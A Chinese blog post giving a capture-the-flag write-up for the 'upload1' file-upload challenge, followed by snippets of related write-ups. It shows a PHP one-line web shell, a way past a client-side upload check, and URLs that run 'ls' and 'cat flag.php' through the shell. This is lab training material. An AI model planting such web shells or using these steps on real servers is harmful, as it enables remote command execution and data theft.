攻防世界 upload1 Writeup

最新推荐文章于 2023-11-06 23:18:05 发布
最新推荐文章于 2023-11-06 23:18:05 发布
阅读量278 收藏
点赞数
文章标签: php web 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011796949/article/details/107795167
版权

进入界面

只有一个上传功能。
在这里插入图片描述

查看源码

在这里插入图片描述
发现前端对文件类型进行了过滤,不是jpg,png文件就把上传按钮禁用。

编写上传文件

php一句话 <?php eval($_GET['cmd']);?>
在这里插入图片描述

绕过验证

在这里插入图片描述

在这里插入图片描述

这里可以在前端把上传按钮删了,然后在控制台用document.getElementById(“aa”).submit() 提交进行绕过。

在这里插入图片描述
上传成功

获取flag

访问上传的文件获取文件目录
http://220.249.52.133:42832/upload/1596538023.213.php?cmd=system(“ls ../”);
在这里插入图片描述
答案已经很简单了,打印flag.php
http://220.249.52.133:42832/upload/1596538023.213.php?cmd=system(“cat ../flag.php”);
在这里插入图片描述
拿到flag

_feiji
关注
攻防世界-upload1
Mr_helloword的博客
08-11 623
upload1 根据题目这是一道文件上传题 当上传一个php文件时提示只能上传图片,并且无法点击提交按钮,这应该是前端对文件类型进行了过滤 查看源代码: 发现一个调用了一个check()函数检测文件类型 我们把这个函数删除如下: 刷新页面发下新可以上传了: 用菜刀或者中国蚁剑连接:(注意菜刀可以连接但是无法查看flag我也不知道为啥) flag: $flag="cyberpeace{097e36244c66c690c16373cffd177aff} 菜刀,但是无法查看 但是无法查看 ...
[CTF刷题篇]攻防世界Web进阶之upload1 Writeup
qq_43668710的博客
04-22 946
前言 这是一道文件上传题,常见的考点有: 1.客户端过滤绕过 //禁用JS 2.文件扩展名绕过 3.黑名单绕过 4.白名单绕过 5.内容类型绕过 6.内容长度绕过 分析 回到这道题,一般先查看源码,看看是不是客户端验证: 很不幸,还真就是客户端验证,直接禁用JavaScript: 应该可以成功绕过了,先写个phpwebshell: 果然还是得刷题,对比我刚开始接触CTF的时候的那股不知所...
file upload 攻防世界_攻防世界-upload1
weixin_39710991的博客
12-30 154
先打开实验环境实验准备:Firefox浏览器+Burp+蚁剑Burp:用于代理浏览器处理的http信息蚁剑:用于一句话木马的文件连接1.1这里选择后缀名为php的文件,发现浏览器很快就做出反应了,ctrl+u看下网页源代码,(可能是js前端的过滤,因为反应太快了);果然是前端js过滤了,只允许后缀为jpg和png的文件上传;1.2解决办法:先准备好含有一句话木马的php文件,密码为zxc(zxc可...
攻防世界upload1
最新发布
bjml_的博客
11-06 874
攻防世界upload1
file upload 攻防世界_攻防世界进阶--upload1
weixin_34945060的博客
02-15 156
今天突然有个小朋友问我这道web题,就打算记录一下(就是来水一篇博客的)考点:文件上传做题:文件上传,基本上就是传送一句话 -> 菜刀(等)连接(题外话:还有服务器等基础文件等等,这一块已经开始扩展了例如:use.ini/.htacess)回归本题:Array.prototype.contains = function (obj) {var i = this.length;while (i-...
攻防世界upload1
金 帛的博客
04-24 2367
攻防世界之文件上传
攻防世界】十三 --- upload1 --- 文件上传
qq_43168364的博客
12-25 422
题目 — upload1 一、writeup 这里上传了纯纯的一句话木马文件,快速的回显出了,弹窗 可以判断使用的是前端检测手段,将getshell.php改名为getshell.jpg上传,用bp抓包 上传成功 对应的目录用蚁剑链接即可 得到flag 二、知识点 文件上传 ......
攻防世界 web高手进阶区 8分题 upload
闵行小鱼塘
08-28 497
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是uploadwriteup
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1361
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
php upload ctf,强网杯CTF防御赛ez_upload Writeup
weixin_35645813的博客
03-17 1192
这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目),这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php,登陆页面,...
攻防世界 upload1
m0_56107268的博客
05-07 214
进入先查看源代码 function check(){ upfile = document.getElementById("upfile"); submit = document.getElementById("submit"); name = upfile.value; ext = name.replace(/^.+\./,''); if(['jpg','png'].contains(ext)){ submit.disabled = false; }else{ submit.disable
攻防世界upload1
weixin_52268949的博客
01-30 1026
upload1 进入环境就一个上传,我们先上传一个普通的木马文件看看 木马内容 <?php @eval($_POST["cmd"]); ?> 估计是前端校验我们查看源码 只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可 然后访问木马文件执行指令即可 执行后查看源码便发现flag ...
攻防世界 | upload1
weixin_47982238的博客
10-07 276
打开网页后,发现是一个文件上传的网站(其实从名字就能看出来) 看一下源代码,了解网站的上传文件的要求——要求上传图片,且文件后缀名为jpg或者png Array.prototype.contains = function (obj) { var i = this.length; while (i--) { if (this[i] === obj) { return true; } } r
攻防世界的里的upload1
一大口木的博客
05-23 646
点击后的页面看一下我的一句话木马。
xctf攻防世界 upload1
m0_71282722的博客
05-08 234
此时将木马文件后缀改为jpg,一会再用bp改过来。查看flag.php 找到flag。第二种上传方式:使用bp绕过。第一种:前端绕过,删除约束。此时能上传php文件了。
攻防世界-Web-upload1
uh_eng的博客
08-25 226
0x01 查看网页源代码,猜测应该是前端验证,只能上传图片文件。前端验证就很好办,把onchange=check()删掉就好了 0x02 准备一份一句话木马<?php eval($_POST['shell']);?>,保存为shell.php,然后上传shell.php,得到返回结果: 然后可以使用菜刀连接,由于我没有装菜刀,于是在浏览器中访问给定的位置,然后通过Hackbar提交POST数据: shell=system("ls ../");这个位置是自己试出来的 shell=highli
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值